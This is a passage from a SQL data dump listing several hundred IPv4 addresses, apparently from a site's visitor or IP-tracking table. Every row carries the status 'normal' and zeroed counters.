1216,'34.121.23.185','normal','',0,0,0,0,0,'[]'),(1217,'31.24.128.55','normal','',0,0,0,0,0,'[]'),(1218,'51.79.176.106','normal','',0,0,0,0,0,'[]'),(1219,'213.136.93.169','normal','',0,0,0,0,0,'[]'),(1220,'192.99.178.20','normal','',0,0,0,0,0,'[]'),(1221,'111.90.145.188','normal','',0,0,0,0,0,'[]'),(1222,'143.198.161.19','normal','',0,0,0,0,0,'[]'),(1223,'164.92.67.42','normal','',0,0,0,0,0,'[]'),(1224,'164.92.205.132','normal','',0,0,0,0,0,'[]'),(1225,'1.116.44.97','normal','',0,0,0,0,0,'[]'),(1226,'217.21.74.226','normal','',0,0,0,0,0,'[]'),(1227,'103.145.50.60','normal','',0,0,0,0,0,'[]'),(1228,'47.242.115.115','normal','',0,0,0,0,0,'[]'),(1229,'108.170.27.202','normal','',0,0,0,0,0,'[]'),(1230,'185.107.112.151','normal','',0,0,0,0,0,'[]'),(1231,'51.75.15.189','normal','',0,0,0,0,0,'[]'),(1232,'119.8.58.8','normal','',0,0,0,0,0,'[]'),(1233,'143.244.172.105','normal','',0,0,0,0,0,'[]'),(1234,'78.47.46.81','normal','',0,0,0,0,0,'[]'),(1235,'92.42.38.23','normal','',0,0,0,0,0,'[]'),(1236,'171.244.133.46','normal','',0,0,0,0,0,'[]'),(1237,'116.118.49.204','normal','',0,0,0,0,0,'[]'),(1238,'185.2.4.98','normal','',0,0,0,0,0,'[]'),(1239,'202.66.173.3','normal','',0,0,0,0,0,'[]'),(1240,'66.29.131.126','normal','',0,0,0,0,0,'[]'),(1241,'157.55.39.89','normal','',0,0,0,0,0,'[]'),(1242,'103.90.235.70','normal','',0,0,0,0,0,'[]'),(1243,'40.77.190.145','normal','',0,0,0,0,0,'[]'),(1244,'103.121.90.150','normal','',0,0,0,0,0,'[]'),(1245,'115.165.166.192','normal','',0,0,0,0,0,'[]'),(1246,'92.204.161.74','normal','',0,0,0,0,0,'[]'),(1247,'79.143.220.71','normal','',0,0,0,0,0,'[]'),(1248,'133.242.249.35','normal','',0,0,0,0,0,'[]'),(1249,'167.86.126.49','normal','',0,0,0,0,0,'[]'),(1250,'74.208.121.173','normal','',0,0,0,0,0,'[]'),(1251,'103.74.120.192','normal','',0,0,0,0,0,'[]'),(1252,'159.138.149.251','normal','',0,0,0,0,0,'[]'),(1253,'89.233.5.168','normal','',0,0,0,0,0,'[]'),(1254,'84.22.153.127','normal','',0,0,0,0,0,'[]'),(1255,'3.111.164.77','normal','',0,0,0,0,0,'[]'),(1256,'185.107.112.75','normal','',0,0,0,0,0,'[]'),(1257,'185.140.240.238','normal','',0,0,0,0,0,'[]'),(1258,'172.104.63.18','normal','',0,0,0,0,0,'[]'),(1259,'146.70.80.63','normal','',0,0,0,0,0,'[]'),(1260,'101.99.90.175','normal','',0,0,0,0,0,'[]'),(1261,'209.145.54.196','normal','',0,0,0,0,0,'[]'),(1262,'39.107.137.177','normal','',0,0,0,0,0,'[]'),(1263,'163.172.135.83','normal','',0,0,0,0,0,'[]'),(1264,'103.115.10.44','normal','',0,0,0,0,0,'[]'),(1265,'68.183.208.161','normal','',0,0,0,0,0,'[]'),(1266,'31.210.66.35','normal','',0,0,0,0,0,'[]'),(1267,'163.44.207.122','normal','',0,0,0,0,0,'[]'),(1268,'167.172.168.111','normal','',0,0,0,0,0,'[]'),(1269,'104.248.139.32','normal','',0,0,0,0,0,'[]'),(1270,'35.86.179.253','normal','',0,0,0,0,0,'[]'),(1271,'91.204.46.118','normal','',0,0,0,0,0,'[]'),(1272,'103.115.10.82','normal','',0,0,0,0,0,'[]'),(1273,'165.22.214.166','normal','',0,0,0,0,0,'[]'),(1274,'176.124.110.135','normal','',0,0,0,0,0,'[]'),(1275,'212.192.24.22','normal','',0,0,0,0,0,'[]'),(1276,'185.208.79.215','normal','',0,0,0,0,0,'[]'),(1277,'120.79.8.125','normal','',0,0,0,0,0,'[]'),(1278,'46.233.32.63','normal','',0,0,0,0,0,'[]'),(1279,'35.153.235.201','normal','',0,0,0,0,0,'[]'),(1280,'8.141.53.126','normal','',0,0,0,0,0,'[]'),(1281,'154.50.0.143','normal','',0,0,0,0,0,'[]'),(1282,'103.115.8.46','normal','',0,0,0,0,0,'[]'),(1283,'20.98.174.213','normal','',0,0,0,0,0,'[]'),(1284,'89.252.138.226','normal','',0,0,0,0,0,'[]'),(1285,'103.166.182.177','normal','',0,0,0,0,0,'[]'),(1286,'35.219.66.183','normal','',0,0,0,0,0,'[]'),(1287,'44.242.147.135','normal','',0,0,0,0,0,'[]'),(1288,'59.110.33.253','normal','',0,0,0,0,0,'[]'),(1289,'92.204.221.178','normal','',0,0,0,0,0,'[]'),(1290,'165.22.211.204','normal','',0,0,0,0,0,'[]'),(1291,'34.176.167.92','normal','',0,0,0,0,0,'[]'),(1292,'35.211.94.153','normal','',0,0,0,0,0,'[]'),(1293,'43.225.53.24','normal','',0,0,0,0,0,'[]'),(1294,'194.5.188.174','normal','',0,0,0,0,0,'[]'),(1295,'85.95.239.243','normal','',0,0,0,0,0,'[]'),(1296,'89.184.95.226','normal','',0,0,0,0,0,'[]'),(1297,'91.210.225.34','normal','',0,0,0,0,0,'[]'),(1298,'80.74.145.155','normal','',0,0,0,0,0,'[]'),(1299,'46.29.50.200','normal','',0,0,0,0,0,'[]'),(1300,'51.79.144.41','normal','',0,0,0,0,0,'[]'),(1301,'194.35.120.82','normal','',0,0,0,0,0,'[]'),(1302,'198.12.250.252','normal','',0,0,0,0,0,'[]'),(1303,'8.142.148.104','normal','',0,0,0,0,0,'[]'),(1304,'52.178.24.182','normal','',0,0,0,0,0,'[]'),(1305,'85.128.143.192','normal','',0,0,0,0,0,'[]'),(1306,'18.139.249.204','normal','',0,0,0,0,0,'[]'),(1307,'172.83.104.51','normal','',0,0,0,0,0,'[]'),(1308,'103.115.9.48','normal','',0,0,0,0,0,'[]'),(1309,'185.141.171.155','normal','',0,0,0,0,0,'[]'),(1310,'85.128.143.62','normal','',0,0,0,0,0,'[]'),(1311,'62.221.192.40','normal','',0,0,0,0,0,'[]'),(1312,'161.35.15.73','normal','',0,0,0,0,0,'[]'),(1313,'46.242.244.193','normal','',0,0,0,0,0,'[]'),(1314,'97.79.239.127','normal','',0,0,0,0,0,'[]'),(1315,'172.104.156.149','normal','',0,0,0,0,0,'[]'),(1316,'147.135.130.239','normal','',0,0,0,0,0,'[]'),(1317,'119.23.185.187','normal','',0,0,0,0,0,'[]'),(1318,'125.212.229.33','normal','',0,0,0,0,0,'[]'),(1319,'107.180.107.103','normal','',0,0,0,0,0,'[]'),(1320,'185.212.70.143','normal','',0,0,0,0,0,'[]'),(1321,'157.7.190.241','normal','',0,0,0,0,0,'[]'),(1322,'200.150.202.196','normal','',0,0,0,0,0,'[]'),(1323,'194.233.89.214','normal','',0,0,0,0,0,'[]'),(1324,'190.92.159.48','normal','',0,0,0,0,0,'[]'),(1325,'168.90.176.14','normal','',0,0,0,0,0,'[]'),(1326,'198.176.55.152','normal','',0,0,0,0,0,'[]'),(1327,'92.51.242.128','normal','',0,0,0,0,0,'[]'),(1328,'188.68.47.69','normal','',0,0,0,0,0,'[]'),(1329,'150.95.112.79','normal','',0,0,0,0,0,'[]'),(1330,'184.168.107.80','normal','',0,0,0,0,0,'[]'),(1331,'149.210.170.197','normal','',0,0,0,0,0,'[]'),(1332,'35.154.23.197','normal','',0,0,0,0,0,'[]'),(1333,'103.93.16.191','normal','',0,0,0,0,0,'[]'),(1334,'119.8.78.61','normal','',0,0,0,0,0,'[]'),(1335,'177.55.116.248','normal','',0,0,0,0,0,'[]'),(1336,'172.93.40.225','normal','',0,0,0,0,0,'[]'),(1337,'185.23.118.241','normal','',0,0,0,0,0,'[]'),(1338,'134.209.105.240','normal','',0,0,0,0,0,'[]'),(1339,'119.237.81.29','normal','',0,0,0,0,0,'[]'),(1340,'190.12.69.74','normal','',0,0,0,0,0,'[]'),(1341,'192.185.6.43','normal','',0,0,0,0,0,'[]'),(1342,'169.158.177.138','normal','',0,0,0,0,0,'[]'),(1343,'52.172.44.202','normal','',0,0,0,0,0,'[]'),(1344,'202.61.232.31','normal','',0,0,0,0,0,'[]'),(1345,'107.22.67.54','normal','',0,0,0,0,0,'[]'),(1346,'119.8.72.227','normal','',0,0,0,0,0,'[]'),(1347,'128.199.109.135','normal','',0,0,0,0,0,'[]'),(1348,'45.136.107.178','normal','',0,0,0,0,0,'[]'),(1349,'185.30.32.94','normal','',0,0,0,0,0,'[]'),(1350,'52.172.51.19','normal','',0,0,0,0,0,'[]'),(1351,'92.204.135.80','normal','',0,0,0,0,0,'[]'),(1352,'103.7.41.245','normal','',0,0,0,0,0,'[]'),(1353,'167.71.36.2','normal','',0,0,0,0,0,'[]'),(1354,'216.238.108.181','normal','',0,0,0,0,0,'[]'),(1355,'207.180.231.208','normal','',0,0,0,0,0,'[]'),(1356,'90.156.169.12','normal','',0,0,0,0,0,'[]'),(1357,'23.168.193.131','normal','',0,0,0,0,0,'[]'),(1358,'103.10.234.86','normal','',0,0,0,0,0,'[]'),(1359,'103.42.111.215','normal','',0,0,0,0,0,'[]'),(1360,'119.8.79.112','normal','',0,0,0,0,0,'[]'),(1361,'51.38.132.211','normal','',0,0,0,0,0,'[]'),(1362,'47.242.193.149','normal','',0,0,0,0,0,'[]'),(1363,'125.253.113.3','normal','',0,0,0,0,0,'[]'),(1364,'77.75.77.72','normal','',0,0,0,0,0,'[]'),(1365,'3.86.250.84','normal','',0,0,0,0,0,'[]'),(1366,'65.99.252.137','normal','',0,0,0,0,0,'[]'),(1367,'37.247.114.170','normal','',0,0,0,0,0,'[]'),(1368,'85.128.143.17','normal','',0,0,0,0,0,'[]'),(1369,'31.172.65.104','normal','',0,0,0,0,0,'[]'),(1370,'75.119.157.181','normal','',0,0,0,0,0,'[]'),(1371,'82.165.88.164','normal','',0,0,0,0,0,'[]'),(1372,'76.77.77.28','normal','',0,0,0,0,0,'[]'),(1373,'45.84.226.212','normal','',0,0,0,0,0,'[]'),(1374,'37.97.151.201','normal','',0,0,0,0,0,'[]'),(1375,'208.109.10.82','normal','',0,0,0,0,0,'[]'),(1376,'180.94.216.161','normal','',0,0,0,0,0,'[]'),(1377,'89.184.219.236','normal','',0,0,0,0,0,'[]'),(1378,'120.27.133.69','normal','',0,0,0,0,0,'[]'),(1379,'198.46.81.30','normal','',0,0,0,0,0,'[]'),(1380,'77.75.78.165','normal','',0,0,0,0,0,'[]'),(1381,'81.169.136.222','normal','',0,0,0,0,0,'[]'),(1382,'202.21.38.119','normal','',0,0,0,0,0,'[]'),(1383,'45.127.4.124','normal','',0,0,0,0,0,'[]'),(1384,'81.88.52.106','normal','',0,0,0,0,0,'[]'),(1385,'77.75.77.62','normal','',0,0,0,0,0,'[]'),(1386,'52.172.42.170','normal','',0,0,0,0,0,'[]'),(1387,'101.35.239.216','normal','',0,0,0,0,0,'[]'),(1388,'52.138.180.227','normal','',0,0,0,0,0,'[]'),(1389,'212.110.92.155','normal','',0,0,0,0,0,'[]'),(1390,'51.120.8.68','normal','',0,0,0,0,0,'[]'),(1391,'92.204.136.105','normal','',0,0,0,0,0,'[]'),(1392,'47.99.208.157','normal','',0,0,0,0,0,'[]'),(1393,'149.28.180.11','normal','',0,0,0,0,0,'[]'),(1394,'114.119.136.99','normal','',0,0,0,0,0,'[]'),(1395,'77.75.76.169','normal','',0,0,0,0,0,'[]'),(1396,'144.91.110.91','normal','',0,0,0,0,0,'[]'),(1397,'167.86.102.161','normal','',0,0,0,0,0,'[]'),(1398,'157.230.59.93','normal','',0,0,0,0,0,'[]'),(1399,'38.34.163.143','normal','',0,0,0,0,0,'[]'),(1400,'112.124.57.178','normal','',0,0,0,0,0,'[]'),(1401,'45.56.121.40','normal','',0,0,0,0,0,'[]'),(1402,'72.167.58.89','normal','',0,0,0,0,0,'[]'),(1403,'208.109.79.3','normal','',0,0,0,0,0,'[]'),(1404,'178.128.201.59','normal','',0,0,0,0,0,'[]'),(1405,'51.255.83.195','normal','',0,0,0,0,0,'[]'),(1406,'116.118.48.239','normal','',0,0,0,0,0,'[]'),(1407,'77.75.79.72','normal','',0,0,0,0,0,'[]'),(1408,'68.168.221.155','normal','',0,0,0,0,0,'[]'),(1409,'80.76.51.210','normal','',0,0,0,0,0,'[]'),(1410,'72.167.32.29','normal','',0,0,0,0,0,'[]'),(1411,'3.81.69.54','normal','',0,0,0,0,0,'[]'),(1412,'68.178.145.44','normal','',0,0,0,0,0,'[]'),(1413,'185.2.4.56','normal','',0,0,0,0,0,'[]'),(1414,'93.76.91.13','normal','',0,0,0,0,0,'[]'),(1415,'156.230.245.74','normal','',0,0,0,0,0,'[]'),(1416,'109.106.254.61','normal','',0,0,0,0,0,'[]'),(1417,'124.153.66.86','normal','',0,0,0,0,0,'[]'),(1418,'67.225.141.109','normal','',0,0,0,0,0,'[]'),(1419,'140.82.3.131','normal','',0,0,0,0,0,'[]'),(1420,'217.21.76.19','normal','',0,0,0,0,0,'[]'),(1421,'114.32.189.156','normal','',0,0,0,0,0,'[]'),(1422,'161.97.69.105','normal','',0,0,0,0,0,'[]'),(1423,'50.62.149.32','normal','',0,0,0,0,0,'[]'),(1424,'45.77.210.166','normal','',0,0,0,0,0,'[]'),(1425,'209.59.168.57','normal','',0,0,0,0,0,'[]'),(1426,'185.187.241.23','normal','',0,0,0,0,0,'[]'),(1427,'193.105.234.82','normal','',0,0,0,0,0,'[]'),(1428,'13.64.60.246','normal','',0,0,0,0,0,'[]'),(1429,'210.1.31.41','normal','',0,0,0,0,0,'[]'),(1430,'77.75.77.101','normal','',0,0,0,0,0,'[]'),(1431,'5.181.217.176','normal','',0,0,0,0,0,'[]'),(1432,'92.205.64.92','normal','',0,0,0,0,0,'[]'),(1433,'103.251.44.226','normal','',0,0,0,0,0,'[]'),(1434,'139.155.21.192','normal','',0,0,0,0,0,'[]'),(1435,'191.101.31.13','normal','',0,0,0,0,0,'[]'),(1436,'65.109.50.239','normal','',0,0,0,0,0,'[]'),(1437,'54.36.148.222','normal','',0,0,0,0,0,'[]'),(1438,'54.36.148.176','normal','',0,0,0,0,0,'[]'),(1439,'114.119.144.80','normal','',0,0,0,0,0,'[]'),(1440,'94.79.123.87','normal','',0,0,0,0,0,'[]'),(1441,'148.66.145.163','normal','',0,0,0,0,0,'[]'),(1442,'14.241.159.130','normal','',0,0,0,0,0,'[]'),(1443,'195.201.201.61','normal','',0,0,0,0,0,'[]'),(1444,'195.201.201.63','normal','',0,0,0,0,0,'[]'),(1445,'195.201.201.60','normal','',0,0,0,0,0,'[]'),(1446,'195.201.201.62','normal','',0,0,0,0,0,'[]'),(1447,'195.201.201.63','normal','',0,0,0,0,0,'[]'),(1448,'195.201.201.63','normal','',0,0,0,0,0,'[]'),(1449,'111.223.52.41','normal','',0,0,0,0,0,'[]'),(1450,'67.20.76.220','normal','',0,0,0,0,0,'[]'),(1451,'194.163.35.105','normal','',0,0,0,0,0,'[]'),(1452,'217.21.95.87','normal','',0,0,0,0,0,'[]'),(1453,'119.18.54.11','normal','',0,0,0,0,0,'[]'),(1454,'171.244.21.74','normal','',0,0,0,0,0,'[]'),(1455,'142.93.75.235','normal','',0,0,0,0,0,'[]'),(1456,'167.99.78.164','normal','',0,0,0,0,0,'[]'),(1457,'52.151.95.67','normal','',0,0,0,0,0,'[]'),(1458,'18.118.235.21','normal','',0,0,0,0,0,'[]'),(1459,'51.210.99.98','normal','',0,0,0,0,0,'[]'),(1460,'45.55.34.247','normal','',0,0,0,0,0,'[]'),(1461,'64.225.65.28','normal','',0,0,0,0,0,'[]'),(1462,'210.245.90.233','normal','',0,0,0,0,0,'[]'),(1463,'152.32.211.172','normal','',0,0,0,0,0,'[]'),(1464,'165.232.190.217','normal','',0,0,0,0,0,'[]'),(1465,'213.190.6.166','normal','',0,0,0,0,0,'[]'),(1466,'145.239.3.48','normal','',0,0,0,0,0,'[]'),(1467,'41.216.188.45','normal','',0,0,0,0,0,'[]'),(1468,'155.133.132.65','normal','',0,0,0,0,0,'[]'),(1469,'93.188.161.211','normal','',0,0,0,0,0,'[]'),(1470,'5.161.61.252','normal','',0,0,0,0,0,'[]'),(1471,'50.21.188.102','normal','',0,0,0,0,0,'[]'),(1472,'50.21.188.72','normal','',0,0,0,0,0,'[]'),(1473,'47.74.17.225','normal','',0,0,0,0,0,'[]'),(1474,'50.21.188.82','normal','',0,0,0,0,0,'[]'),(1475,'50.21.188.92','normal','',0,0,0,0,0,'[]'),(1476,'45.252.251.43','normal','',0,0,0,0,0,'[]'),(1477,'148.72.244.254','normal','',0,0,0,0,0,'[]'),(1478,'162.214.123.41','normal','',0,0,0,0,0,'[]'),(1479,'138.197.106.86','normal','',0,0,0,0,0,'[]'),(1480,'103.130.218.178','normal','',0,0,0,0,0,'[]'),(1481,'104.131.189.63','normal','',0,0,0,0,0,'[]'),(1482,'35.236.152.169','normal','',0,0,0,0,0,'[]'),(1483,'185.225.33.99','normal','',0,0,0,0,0,'[]'),(1484,'128.199.178.73','normal','',0,0,0,0,0,'[]'),(1485,'23.230.235.61','normal','',0,0,0,0,0,'[]'),(1486,'23.230.235.156','normal','',0,0,0,0,0,'[]'),(1487,'23.230.235.54','normal','',0,0,0,0,0,'[]'),(1488,'23.230.235.86','normal','',0,0,0,0,0,'[]'),(1489,'23.230.235.94','normal','',0,0,0,0,0,'[]'),(1490,'23.230.235.83','normal','',0,0,0,0,0,'[]'),(1491,'23.230.235.68','normal','',0,0,0,0,0,'[]'),(1492,'54.36.148.42','normal','',0,0,0,0,0,'[]'),(1493,'149.202.28.160','normal','',0,0,0,0,0,'[]'),(1494,'188.212.34.69','normal','',0,0,0,0,0,'[]'),(1495,'36.67.122.42','normal','',0,0,0,0,0,'[]'),(1496,'103.171.181.192','normal','',0,0,0,0,0,'[]'),(1497,'123.57.172.30','normal','',0,0,0,0,0,'[]'),(1498,'82.163.176.117','normal','',0,0,0,0,0,'[]'),(1499,'35.187.58.136','normal','',0,0,0,0,0,'[]'),(1500,'149.62.37.235','normal','',0,0,0,0,0,'[]'),(1501,'137.184.140.67','normal','',0,0,0,0,0,'[]'),(1502,'62.109.151.48','normal','',0,0,0,0,0,'[]'),(1503,'178.128.254.0','normal','',0,0,0,0,0,'[]'),(1504,'43.251.135.217','normal','',0,0,0,0,0,'[]'),(1505,'185.81.157.128','normal','',0,0,0,0,0,'[]'),(1506,'208.109.214.179','normal','',0,0,0,0,0,'[]'),(1507,'51.68.11.199','normal','',0,0,0,0,0,'[]'),(1508,'159.65.219.142','normal','',0,0,0,0,0,'[]'),(1509,'54.162.174.189','normal','',0,0,0,0,0,'[]'),(1510,'54.162.174.189','normal','',0,0,0,0,0,'[]'),(1511,'37.59.45.38','normal','',0,0,0,0,0,'[]'),(1512,'198.58.127.244','normal','',0,0,0,0,0,'[]'),(1513,'144.91.70.228','normal','',0,0,0,0,0,'[]'),(1514,'178.170.41.94','normal','',0,0,0,0,0,'[]'),(1515,'51.144.33.42','normal','',0,0,0,0,0,'[]'),(1516,'185.212.70.150','normal','',0,0,0,0,0,'[]'),(1517,'72.167.8.15','normal','',0,0,0,0,0,'[]'),(1518,'138.219.230.121','normal','',0,0,0,0,0,'[]'),(1519,'156.67.74.216','normal','',0,0,0,0,0,'[]'),(1520,'124.221.179.165','normal','',0,0,0,0,0,'[]'),(1521,'31.24.159.204','normal','',0,0,0,0,0,'[]'),(1522,'157.55.39.219','normal','',0,0,0,0,0,'[]'),(1523,'185.213.81.33','normal','',0,0,0,0,0,'[]'),(1524,'143.244.177.220','normal','',0,0,0,0,0,'[]'),(1525,'69.89.27.23','normal','',0,0,0,0,0,'[]'),(1526,'92.249.44.189','normal','',0,0,0,0,0,'[]'),(1527,'182.92.75.79','normal','',0,0,0,0,0,'[]'),(1528,'101.201.199.151','normal','',0,0,0,0,0,'[]'),(1529,'2.144.4.112','normal','',0,0,0,0,0,'[]'),(1530,'109.237.138.49','normal','',0,0,0,0,0,'[]'),(1531,'45.77.41.181','normal','',0,0,0,0,0,'[]'),(1532,'162.241.2.46','normal','',0,0,0,0,0,'[]'),(1533,'45.149.79.206','normal','',0,0,0,0,0,'[]'),(1534,'37.97.218.49','normal','',0,0,0,0,0,'[]'),(1535,'185.241.5.202','normal','',0,0,0,0,0,'[]'),(1536,'167.172.79.47','normal','',0,0,0,0,0,'[]'),(1537,'66.249.68.37','normal','',0,0,0,0,0,'[]'),(1538,'66.249.68.34','normal','',0,0,0,0,0,'[]'),(1539,'107.180.247.212','normal','',0,0,0,0,0,'[]'),(1540,'31.170.160.57','normal','',0,0,0,0,0,'[]'),(1541,'121.40.177.68','normal','',0,0,0,0,0,'[]'),(1542,'193.176.230.19','normal','',0,0,0,0,0,'[]'),(1543,'217.146.69.54','normal','',0,0,0,0,0,'[]'),(1544,'207.46.13.46','normal','',0,0,0,0,0,'[]'),(1545,'37.58.57.95','normal','',0,0,0,0,0,'[]'),(1546,'37.58.57.95','normal','',0,0,0,0,0,'[]'),(1547,'139.196.155.194','normal','',0,0,0,0,0,'[]'),(1548,'112.78.1.142','normal','',0,0,0,0,0,'[]'),(1549,'124.70.98.118','normal','',0,0,0,0,0,'[]'),(1550,'103.129.178.69','normal','',0,0,0,0,0,'[]'),(1551,'148.72.244.53','normal','',0,0,0,0,0,'[]'),(1552,'119.45.164.21','normal','',0,0,0,0,0,'[]'),(1553,'47.96.40.87','normal','',0,0,0,0,0,'[]'),(1554,'175.24.130.140','normal','',0,0,0,0,0,'[]'),(1555,'148.251.70.130','normal','',0,0,0,0,0,'[]'),(1556,'185.80.201.103','normal','',0,0,0,0,0,'[]'),(1557,'153.92.6.78','normal','',0,0,0,0,0,'[]'),(1558,'23.88.4.230','normal','',0,0,0,0,0,'[]'),(1559,'124.158.12.149','normal','',0,0,0,0,0,'[]'),(1560,'103.82.32.25','normal','',0,0,0,0,0,'[]'),(1561,'195.179.237.69','normal','',0,0,0,0,0,'[]'),(1562,'65.52.67.200','normal','',0,0,0,0,0,'[]'),(1563,'37.34.57.58','normal','',0,0,0,0,0,'[]'),(1564,'177.53.140.226','normal','',0,0,0,0,0,'[]'),(1565,'217.21.91.143','normal','',0,0,0,0,0,'[]'),(1566,'185.58.73.249','normal','',0,0,0,0,0,'[]'),(1567,'43.156.80.77','normal','',0,0,0,0,0,'[]'),(1568,'173.44.40.53','normal','',0,0,0,0,0,'[]'),(1569,'82.165.184.76','normal','',0,0,0,0,0,'[]'),(1570,'83.150.214.18','normal','',0,0,0,0,0,'[]'),(1571,'74.37.64.14','normal','',0,0,0,0,0,'[]'),(1572,'74.37.64.14','normal','',0,0,0,0,0,'[]'),(1573,'77.95.248.139','normal','',0,0,0,0,0,'[]'),(1574,'103.226.251.11','normal','',0,0,0,0,0,'[]'),(1575,'34.87.94.148','normal','',0,0,0,0,0,'[]'),(1576,'185.219.42.139','normal','',0,0,0,0,0,'[]'),(1577,'185.219.42.139','normal','',0,0,0,0,0,'[]'),(1578,'87.222.28.255','normal','',0,0,0,0,0,'[]'),(1579,'35.239.6.182','normal','',0,0,0,0,0,'[]'),(1580,'135.181.180.59','normal','',0,0,0,0,0,'[]'),(1581,'185.98.131.154','normal','',0,0,0,0,0,'[]'),(1582,'66.29.138.73','normal','',0,0,0,0,0,'[]'),(1583,'217.21.84.203','normal','',0,0,0,0,0,'[]'),(1584,'167.114.185.159','normal','',0,0,0,0,0,'[]'),(1585,'8.210.174.93','normal','',0,0,0,0,0,'[]'),(1586,'13.38.60.78','normal','',0,0,0,0,0,'[]'),(1587,'185.212.128.208','normal','',0,0,0,0,0,'[]'),(1588,'185.212.128.208','normal','',0,0,0,0,0,'[]'),(1589,'51.75.145.64','normal','',0,0,0,0,0,'[]'),(1590,'103.74.118.242','normal','',0,0,0,0,0,'[]'),(1591,'111.207.155.211','normal','',0,0,0,0,0,'[]'),(1592,'162.144.152.168','normal','',0,0,0,0,0,'[]'),(1593,'188.225.18.210','normal','',0,0,0,0,0,'[]'),(1594,'65.2.129.199','normal','',0,0,0,0,0,'[]'),(1595,'54.36.148.142','normal','',0,0,0,0,0,'[]'),(1596,'54.36.148.49','normal','',0,0,0,0,0,'[]'),(1597,'203.112.72.51','normal','',0,0,0,0,0,'[]'),(1598,'5.181.218.3','normal','',0,0,0,0,0,'[]'),(1599,'51.79.231.79','normal','',0,0,0,0,0,'[]'),(1600,'173.247.251.42','normal','',0,0,0,0,0,'[]'),(1601,'44.198.215.135','normal','',0,0,0,0,0,'[]'),(1602,'167.86.107.77','normal','',0,0,0,0,0,'[]'),(1603,'134.209.154.203','normal','',0,0,0,0,0,'[]'),(1604,'134.209.154.203','normal','',0,0,0,0,0,'[]'),(1605,'92.53.96.102','normal','',0,0,0,0,0,'[]'),(1606,'92.53.96.102','normal','',0,0,0,0,0,'[]'),(1607,'81.31.147.143','normal','',0,0,0,0,0,'[]'),(1608,'35.82.19.77','normal','',0,0,0,0,0,'[]'),(1609,'114.119.148.138','normal','',0,0,0,0,0,'[]'),(1610,'34.79.206.104','normal','',0,0,0,0,0,'[]'),(1611,'34.125.43.64','normal','',0,0,0,0,0,'[]'),(1612,'202.172.26.51','normal','',0,0,0,0,0,'[]'),(1613,'103.150.136.176','normal','',0,0,0,0,0,'[]'),(1614,'47.74.91.54','normal','',0,0,0,0,0,'[]'),(1615,'5.101.157.46','normal','',0,0,0,0,0,'[]'),(1616,'5.101.157.46','normal','',0,0,0,0,0,'[]'),(1617,'185.185.127.125','normal','',0,0,0,0,0,'[]'),(1618,'37.187.25.44','normal','',0,0,0,0,0,'[]'),(1619,'176.114.7.87','normal','',0,0,0,0,0,'[]'),(1620,'35.90.244.136','normal','',0,0,0,0,0,'[]'),(1621,'35.166.92.125','normal','',0,0,0,0,0,'[]'),(1622,'142.132.155.150','normal','',0,0,0,0,0,'[]'),(1623,'142.132.155.150','normal','',0,0,0,0,0,'[]'),(1624,'144.91.80.116','normal','',0,0,0,0,0,'[]'),(1625,'194.59.205.95','normal','',0,0,0,0,0,'[]'),(1626,'35.85.227.59','normal','',0,0,0,0,0,'[]'),(1627,'173.82.16.112','normal','',0,0,0,0,0,'[]'),(1628,'64.124.8.43','normal','',0,0,0,0,0,'[]'),(1629,'44.224.175.194','normal','',0,0,0,0,0,'[]'),(1630,'79.174.13.180','normal','',0,0,0,0,0,'[]'),(1631,'79.174.13.180','normal','',0,0,0,0,0,'[]'),(1632,'167.114.128.231','normal','',0,0,0,0,0,'[]'),(1633,'119.254.118.21','normal','',0,0,0,0,0,'[]'),(1634,'166.0.238.205','normal','',0,0,0,0,0,'[]'),(1635,'87.249.44.153','normal','',0,0,0,0,0,'[]'),(1636,'87.249.44.153','normal','',0,0,0,0,0,'[]'),(1637,'62.109.150.211','normal','',0,0,0,0,0,'[]'),(1638,'185.207.228.4','normal','',0,0,0,0,0,'[]'),(1639,'185.207.228.4','normal','',0,0,0,0,0,'[]'),(1640,'192.150.10.200','normal','',0,0,0,0,0,'[]'),(1641,'134.122.64.249','normal','',0,0,0,0,0,'[]'),(1642,'24.208.225.117','normal','',0,0,0,0,0,'[]'),(1643,'24.208.225.117','normal','',0,0,0,0,0,'[]'),(1644,'185.240.103.105','normal','',0,0,0,0,0,'[]'),(1645,'185.240.103.105','normal','',0,0,0,0,0,'[]'),(1646,'31.130.203.168','normal','',0,0,0,0,0,'[]'),(1647,'31.130.203.168','normal','',0,0,0,0,0,'[]'),(1648,'66.249.75.191','normal','',0,0,0,0,0,'[]'),(1649,'69.226.255.0','normal','',0,0,0,0,0,'[]'),(1650,'97.87.229.190','normal','',0,0,0,0,0,'[]'),(1651,'97.87.229.190','normal','',0,0,0,0,0,'[]'),(1652,'20.230.116.82','normal','',0,0,0,0,0,'[]'),(1653,'212.1.208.239','normal','',0,0,0,0,0,'[]'),(1654,'128.199.119.127','normal','',0,0,0,0,0,'[]'),(1655,'31.220.110.210','normal','',0,0,0,0,0,'[]'),(1656,'207.46.13.231','normal','',0,0,0,0,0,'[]'),(1657,'192.81.211.161','normal','',0,0,0,0,0,'[]'),(1658,'64.124.8.23','normal','',0,0,0,0,0,'[]'),(1659,'185.54.228.8','normal','',0,0,0,0,0,'[]'),(1660,'54.147.144.98','normal','',0,0,0,0,0,'[]'),(1661,'54.147.144.98','normal','',0,0,0,0,0,'[]'),(1662,'202.88.241.72','normal','',0,0,0,0,0,'[]'),(1663,'192.99.0.24','normal','',0,0,0,0,0,'[]'),(1664,'128.199.73.182','normal','',0,0,0,0,0,'[]'),(1665,'68.183.176.180','normal','',0,0,0,0,0,'[]'),(1666,'13.236.87.124','normal','',0,0,0,0,0,'[]'),(1667,'54.36.148.30','normal','',0,0,0,0,0,'[]'),(1668,'152.228.134.233','normal','',0,0,0,0,0,'[]'),(1669,'2.59.117.3','normal','',0,0,0,0,0,'[]'),(1670,'2.59.117.3','normal','',0,0,0,0,0,'[]'),(1671,'104.243.26.114','normal','',0,0,0,0,0,'[]'),(1672,'141.94.74.98','normal','',0,0,0,0,0,'[]'),(1673,'109.106.246.153','normal','',0,0,0,0,0,'[]'),(1674,'188.120.236.114','normal','',0,0,0,0,0,'[]'),(1675,'45.128.206.89','normal','',0,0,0,0,0,'[]'),(1676,'192.99.160.41','normal','',0,0,0,0,0,'[]'),(1677,'194.59.165.88','normal','',0,0,0,0,0,'[]'),(1678,'178.128.54.239','normal','',0,0,0,0,0,'[]'),(1679,'5.101.156.170','normal','',0,0,0,0,0,'[]'),(1680,'20.242.2.0','normal','',0,0,0,0,0,'[]'),(1681,'180.252.80.243','normal','',0,0,0,0,0,'[]'),(1682,'185.243.11.51','normal','',0,0,0,0,0,'[]'),(1683,'92.205.25.182','normal','',0,0,0,0,0,'[]'),(1684,'128.199.68.99','normal','',0,0,0,0,